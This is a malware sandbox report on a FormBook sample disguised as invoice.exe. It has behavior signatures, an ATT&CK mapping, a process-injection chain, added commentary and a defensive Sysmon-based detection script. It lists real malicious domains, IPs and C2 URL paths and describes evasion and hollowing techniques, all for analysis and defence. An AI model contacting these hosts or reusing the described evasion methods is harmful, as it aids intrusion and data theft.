          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

Reading the dump names: the fields are process index, analysis phase, dump id, base address, page protection and region type. Protection 00000040 is PAGE_EXECUTE_READWRITE, 00000004 is PAGE_READWRITE. The region at 0x400000 in process 3 is the image base of the hollowed second invoice.exe instance, and it is the region the unpacked PE (3.2.invoice.exe.400000.0.unpack) was carved from.

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

MITRE ATT&CK Matrix

The matrix is listed here by tactic (column). Bracketed numbers are the signature-count badges the report shows beside a matched technique; entries without a count are the matrix's standard placeholders and were not matched for this sample.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Shared Modules [1]; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [4]; Software Packing [3]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [221]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Remote System Discovery [1]; System Information Discovery [112]; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 383898 | Sample: invoice.exe | Start date: 08/04/2021 | Architecture: WINDOWS | Score: 100

The graph is an image (its legend distinguishes process, signature, created file, DNS/IP info, dropped, Windows process, counts of created registry values and files, implementation language, malicious and Internet nodes). The node contents recovered from the page are:

Root (sample)
  DNS: www.harshdeepfashion.com; www.arizonagridiron.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

invoice.exe (started from the root)
  Dropped: C:\Users\user\AppData\...\invoice.exe.log, ASCII
  Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes

invoice.exe (second instance, started by the first)
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)

explorer.exe (injected by the second invoice.exe)
  DNS/IP: hotelmaktub.com 177.55.108.130, ports 49732 -> 80, RedeHostInternetLtdaBR, Brazil; www.highdeserthealthinsurance.com 74.208.236.64, ports 49731 -> 80, ONEANDONE-ASBrauerstrasse48DE, United States; 15 other IPs or domains
  Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation

wscript.exe (started by explorer.exe)
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements

cmd.exe (started by wscript.exe)

conhost.exe (started by cmd.exe)
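Turning the chain in the graph into detection logic, as an added example that is not part of the Joe Sandbox report: the script below runs three rules over constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection, Sysmon field names). Hostnames, IPs and ports are the ones the report lists; the process GUIDs, the full paths of wscript.exe, cmd.exe and conhost.exe, the set of script hosts and the fan-out threshold are assumptions made for the example.

```python
"""Detection logic for the injection-and-beaconing chain drawn in the behavior graph.

Added example, not part of the Joe Sandbox report. Events are constructed
Sysmon-style records (EventID 1 = process creation, EventID 3 = network
connection) with Sysmon's field names. Hostnames, IPs and ports come from the
report; process GUIDs, the paths of wscript.exe/cmd.exe/conhost.exe, the script
host list and the fan-out threshold are assumptions made for the example.
"""
from collections import defaultdict

# Assumption: script hosts that should not be children of explorer.exe without a
# user-visible script on the command line.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Assumption: a shell process contacting several distinct HTTP hosts in one run
# is the signal; FormBook works through a list of configured domains.
MIN_DISTINCT_HOSTS = 2

EVENTS = [
    # invoice.exe started from the desktop by the user's shell
    {"EventID": 1, "ProcessGuid": "P11", "Image": r"C:\Users\user\Desktop\invoice.exe",
     "ParentProcessGuid": "P02", "ParentImage": r"C:\Windows\explorer.exe"},
    # invoice.exe starts a second copy of itself (the instance that gets hollowed)
    {"EventID": 1, "ProcessGuid": "P15", "Image": r"C:\Users\user\Desktop\invoice.exe",
     "ParentProcessGuid": "P11", "ParentImage": r"C:\Users\user\Desktop\invoice.exe"},
    # the injected explorer.exe beacons over plain HTTP
    {"EventID": 3, "ProcessGuid": "P18", "Image": r"C:\Windows\explorer.exe",
     "DestinationHostname": "hotelmaktub.com", "DestinationIp": "177.55.108.130",
     "DestinationPort": 80},
    {"EventID": 3, "ProcessGuid": "P18", "Image": r"C:\Windows\explorer.exe",
     "DestinationHostname": "www.highdeserthealthinsurance.com",
     "DestinationIp": "74.208.236.64", "DestinationPort": 80},
    # explorer.exe -> wscript.exe -> cmd.exe -> conhost.exe
    {"EventID": 1, "ProcessGuid": "P22", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentProcessGuid": "P18", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessGuid": "P25", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentProcessGuid": "P22", "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"EventID": 1, "ProcessGuid": "P27", "Image": r"C:\Windows\System32\conhost.exe",
     "ParentProcessGuid": "P25", "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def _base(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def self_relaunch_from_user_dir(events):
    """Rule 1: a binary under \\Users\\ starts a second copy of itself.
    In the graph this is invoice.exe starting invoice.exe just before the
    hollowing signatures fire on the child."""
    hits = []
    for e in events:
        if e["EventID"] != 1:
            continue
        image = e["Image"].lower()
        if image == e["ParentImage"].lower() and "\\users\\" in image:
            hits.append(e["Image"])
    return hits


def explorer_scripthost_cmd_chain(events):
    """Rule 2: cmd.exe whose parent is a script host whose parent is explorer.exe,
    i.e. the explorer.exe -> wscript.exe -> cmd.exe chain from the graph."""
    by_guid = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    chains = []
    for e in by_guid.values():
        if _base(e["Image"]) != "cmd.exe":
            continue
        parent = by_guid.get(e["ParentProcessGuid"])
        if (parent and _base(parent["Image"]) in SCRIPT_HOSTS
                and _base(parent["ParentImage"]) == "explorer.exe"):
            chains.append((parent["ParentImage"], parent["Image"], e["Image"]))
    return chains


def system_process_http_fanout(events, min_hosts=MIN_DISTINCT_HOSTS):
    """Rule 3: explorer.exe itself opening HTTP(S) connections to several
    distinct hosts ('System process connects to network' in the report).
    Returns {ProcessGuid: sorted hostnames} for each offending process."""
    hosts = defaultdict(set)
    for e in events:
        if (e["EventID"] == 3 and _base(e["Image"]) == "explorer.exe"
                and e["DestinationPort"] in (80, 443)):
            hosts[e["ProcessGuid"]].add(e["DestinationHostname"])
    return {guid: sorted(h) for guid, h in hosts.items() if len(h) >= min_hosts}


def detect(events):
    """Run all three rules and return their hits keyed by rule name."""
    return {
        "self_relaunch_from_user_dir": self_relaunch_from_user_dir(events),
        "explorer_scripthost_cmd_chain": explorer_scripthost_cmd_chain(events),
        "system_process_http_fanout": system_process_http_fanout(events),
    }


if __name__ == "__main__":
    for rule, hits in detect(EVENTS).items():
        print(f"{rule}: {hits}")
```

Each rule needs tuning before production use: explorer.exe opens connections of its own, so Rule 3 wants an allowlist of known destinations; a user double-clicking a .vbs also produces explorer.exe -> wscript.exe, so Rule 2 should additionally require an empty or unusual command line where the telemetry carries one (the report shows no command lines, so the rule does not check them); and self-updating applications can trip Rule 1.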


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
invoice.exe | 100% | Joe Sandbox ML | -

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.invoice.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

TR/Crypt.ZPACK.Gen is Avira's generic label for packed or crypted trojans, not a family name; the FormBook attribution comes from the Yara matches above, and it fires on the unpacked image rather than on the original sample.

Domains

Source | Detection | Scanner
legacyadmin.support | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (3 lookups) | safe
http://www.tiro.com | 0% | URL Reputation (3 lookups) | safe
http://www.goodfont.co.kr | 0% | URL Reputation (3 lookups) | safe
http://www.carterandcone.coml | 0% | URL Reputation (3 lookups) | safe
http://www.sajatypeworks.com | 0% | URL Reputation (3 lookups) | safe
http://www.typography.netD | 0% | URL Reputation (3 lookups) | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (3 lookups) | safe
https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (3 lookups) | safe
http://fontfabrik.com | 0% | URL Reputation (3 lookups) | safe
http://www.founder.com.cn/cn | 0% | URL Reputation (3 lookups) | safe
http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (3 lookups) | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (3 lookups) | safe
http://www.sandoll.co.kr | 0% | URL Reputation (3 lookups) | safe
www.sookepointcargo.com/e3rs/ | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation (3 lookups) | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation (3 lookups) | safe
http://www.sakkal.com | 0% | URL Reputation (3 lookups) | safe

Most entries in this table are font-vendor URLs of the kind carried in TrueType name tables; they come from the font enumeration above, and the trailing fragments (coml, netD, DPlease) are neighbouring string bytes swept up by string extraction, not parts of a URL. The three that matter are the ones on domains the Contacted Domains table marks malicious (legacyadmin.support, www.knoxvilleoutdoorkitchens.com, www.sookepointcargo.com); note the /e3rs/ path shared by two of them, and that URL reputation rates all three safe with 0% detection, which is the usual lag of reputation feeds behind freshly registered or compromised hosts.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.highdeserthealthinsurance.com | 74.208.236.64 | true | true | - | unknown
armaccountingbs.com | 2.57.90.16 | true | true | - | unknown
legacyadmin.support | 192.0.78.24 | true | true | - | unknown
www.harshdeepfashion.com | 216.239.34.21 | true | false | - | unknown
www.jinlan.online.s.strikinglydns.com | 35.156.117.131 | true | true | - | unknown
hotelmaktub.com | 177.55.108.130 | true | true | - | unknown
www.arizonagridiron.com | 23.27.42.72 | true | false | - | unknown
flowhcf.com | 184.168.131.241 | true | true | - | unknown
www.knoxvilleoutdoorkitchens.com | 208.91.197.91 | true | true | - | unknown
www.dateyourlovelive.club | unknown | unknown | true | - | unknown
www.legacyadmin.support | unknown | unknown | true | - | unknown
www.gunungbatufrozen.com | unknown | unknown | true | - | unknown
www.hotelmaktub.com | unknown | unknown | true | - | unknown
www.flowhcf.com | unknown | unknown | true | - | unknown
www.sookepointcargo.com | unknown | unknown | true | - | unknown
www.jinlan.online | unknown | unknown | true | - | unknown
www.armaccountingbs.com | unknown | unknown | true | - | unknown
www.zmid.xyz | unknown | unknown | true | - | unknown

None of these hosts has an antivirus-detection entry; the malicious verdicts come from the sandbox's own analysis of the injected explorer.exe's traffic, and two of the resolved hosts (www.harshdeepfashion.com, www.arizonagridiron.com) are rated not malicious despite being contacted in the same run. Treat the list as this sample's configured domain set rather than as a confirmed set of live C2 servers when building blocklists.

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.sookepointcargo.com/e3rs/ | true | Avira URL Cloud: safe | low

URLs from Memory and Binaries

Source A = invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp
Source B = explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | A, B | false | - | high
http://www.fontbureau.com | A, B | false | - | high
http://www.fontbureau.com/designersG | A, B | false | - | high
http://www.fontbureau.com/designers/? | A, B | false | - | high
http://www.founder.com.cn/cn/bThe | A, B | false | URL Reputation: safe (3 lookups) | unknown
http://www.fontbureau.com/designers? | A, B | false | - | high
https://dist.nuget.org/win-x86-commandline/latest/nuget.exe | invoice.exe | false | - | high
https://github.com/d-haxton/HaxtonBot/archive/master.zip | invoice.exe | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4 | invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com | B | false | URL Reputation: safe (3 lookups) | unknown
http://www.fontbureau.com/designers | B | false | - | high
                                                              http://www.goodfont.co.krinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssinvoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.carterandcone.comlinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sajatypeworks.cominvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.typography.netDinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/cTheinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2Jwscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htminvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://fontfabrik.cominvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.founder.com.cn/cninvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8gwscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
